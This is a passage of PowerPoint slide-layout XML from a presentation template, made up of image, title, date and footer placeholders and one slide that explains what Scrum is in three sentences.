            <a:extLst>
              <a:ext uri="{DB07E57F-F534-40C3-9BEA-AA27CBAB95D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7D013C1-112C-4318-8025-18A628A0615D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="7"/>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94694BF2-E63D-4BC2-9560-CBD31B07ADAE}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{BD498901-B306-4EC9-8190-7489CD9555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C6CBDFC-A649-49F4-B841-2BD0A615CFBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="8"/>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282EBEA7-6E2B-4EF0-87C6-7E574898AAF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Title 1">
            <a:extLst>
              <a:ext uri="{0043C534-9E16-4F3B-8D6A-AC0A299A19F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7EFEFEC-E48C-45A9-9C40-9123C61CECBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086225" y="1754809"/>
            <a:ext cx="4764995" cy="967520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="4000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:rPr>
              <a:t>Add title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{BF166250-4850-4692-9681-4A8AF55F78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47CC0A-B41D-4B2B-89E6-91172ADBCDD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="2895600"/>
            <a:ext cx="34289" cy="214311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D14B24"/>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5">
            <a:extLst>
              <a:ext uri="{97D2212A-6976-4012-8AA6-774087E165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479389E-464C-4459-863D-E1FAF86381E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4254103" y="2857500"/>
            <a:ext cx="4500676" cy="282197"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Dosis Light"/>
              </a:rPr>
              <a:t>ADD HEADER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 10">
            <a:extLst>
              <a:ext uri="{CC1EA2EF-A65C-4A2D-8D51-5C39EC7AEA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72A21F-1161-4230-B66D-9AF543DF87C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7330678" y="4408884"/>
            <a:ext cx="1496615" cy="322659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{5BC1DBE3-BEDB-4B97-B1EA-AD323EBC99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CF554FC-4861-45BE-B8EE-F9D9B7BA47BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{43B88C31-E3C1-49FF-BA22-CEE2D116E628}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{50413D56-972A-4D76-9C2D-F84D958B53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47B1425-2CEF-45AB-940D-47C62A83CA50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="14"/>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08A78D78-580C-4FFB-B57A-D11D2C2BF270}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{3378D761-A815-4765-9298-2B17795809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82246D1-B4EE-44F8-B27D-C823EAECC2F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>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extLst>
      <p:ext uri="{969B251E-9E33-46B1-8E53-B8DD57605AD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Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{1D5B2EB0-B94C-47CE-8351-55B20DF14C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E51194-CD88-444C-A3B4-233B3F57191F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3478B6"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6DFF0880-F93D-439C-86A5-650A743074B5}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{35946AE3-316C-4A67-B5D0-9FFFDFA918C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851882-C823-4B5D-AE73-6822387C3BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66675" y="1193006"/>
            <a:ext cx="2232098" cy="2023510"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr"/>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{C19FE511-4633-42FF-A3C7-EE5E373308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129A7B-2D97-4F00-B191-C0DFF5466132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75885" y="3223850"/>
            <a:ext cx="2232098" cy="1406766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{9BF77E16-C43C-42AA-9438-6F2DFE05437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8AB4100-FB13-4F69-B2A8-AC0ABB38638E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315307" y="1193006"/>
            <a:ext cx="3736730" cy="1620531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr"/>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{F60D592D-CE05-4468-92F5-6AE6627D3F7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4A96D1E-AFA1-4288-A901-49550C167D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6059365" y="1193006"/>
            <a:ext cx="3084634" cy="3436143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{A4F5D3A6-EDF7-4450-89A9-F03EACF5D7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650577-C1FE-4F52-90A1-95CA1E2ED8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315307" y="2820865"/>
            <a:ext cx="1956288" cy="1809750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{AC096366-8366-4151-A4FB-4F6E8747973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F055D4-ECB3-4FB8-865A-0ADE6B010FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278924" y="2820865"/>
            <a:ext cx="1773115" cy="1809750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{029A3418-DEB9-41EF-BB1B-433C146D97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BB81AE5-7FC5-4A69-8722-D5368146FB37}"/>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697F0A38-EE4B-40FB-995A-EBD48D18E7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0A1DAB-E4C3-4190-9F41-5E6A481E7D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3219450" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="381000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>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11" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{E2A202C0-BCCA-4221-A940-0626B6AC9E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13F977-36F6-4F87-A5EE-D9813E1EAD0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="8"/>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6864E8F4-E078-49DE-BF2F-116FFF3CE06C}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{B52B7379-799C-49D8-8C59-56E956A4F4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10D6A7-42D0-4DFD-96BE-5F8583A4D135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="9"/>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extLst>
      <p:ext uri="{B26A2F9B-8E7C-4159-88EF-A78DC9C631D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hat is SCRUM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{58383C8C-B13A-4947-86FF-7AFE97DDFC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D566734-09E1-40A9-A8FC-47E50F32C3D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9088120" y="0"/>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203EDE34-E955-477B-A96D-27B0FE019C1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CB834D-4BFF-4C79-B8FD-D2B673B5BDE8}"/>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AE3FFDD2-9500-42D9-8C83-5765BA1530A0}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{89D46AE4-771E-48CE-8B51-61CEBA6F75B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180793F-CDC4-4609-8D42-C6FC0370EE49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1809750"/>
            <a:ext cx="3242253" cy="2914021"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Scrum is an agile framework for managing knowledge work. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>It is designed for incremental product development using one or more self-organizing, cross-functional teams of 3-9 people.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Scrum utilized fixed length iterations referred to as “sprints” which are no longer than 30 days.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{68654EA8-E551-4C98-BB6D-C354896116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FE5D5D-F174-4352-851C-0C30B75D7222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348445" y="2714175"/>
            <a:ext cx="1584344" cy="262817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{51981F04-A305-4FDF-B124-803C4A4EE8E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9A57B96-E3F4-4218-8876-F8F283A44DD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{121C1E30-A7EF-4C77-AD38-A96DE7D21E1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1206DBD-1590-486C-B897-30C740390788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133850" y="1285875"/>
            <a:ext cx="5010111" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr"/>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Image Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{06FAA0ED-323E-4954-AEDB-959236E7B72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E92A34-76EC-4759-8AF8-7618DF4B13CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1200150"/>
            <a:ext cx="3242253" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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What is SCRUM?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{24146EA5-020A-435B-9DFE-5532B68894D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CEF4A4A-73DA-48C3-93B9-33F773AA4E9D}"/>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2">
            <a:extLst>
              <a:ext uri="{B3708561-54D6-4F6F-9436-DD8FE324A9A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2AB827-8E4F-41C1-AC0C-6E79AC231E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
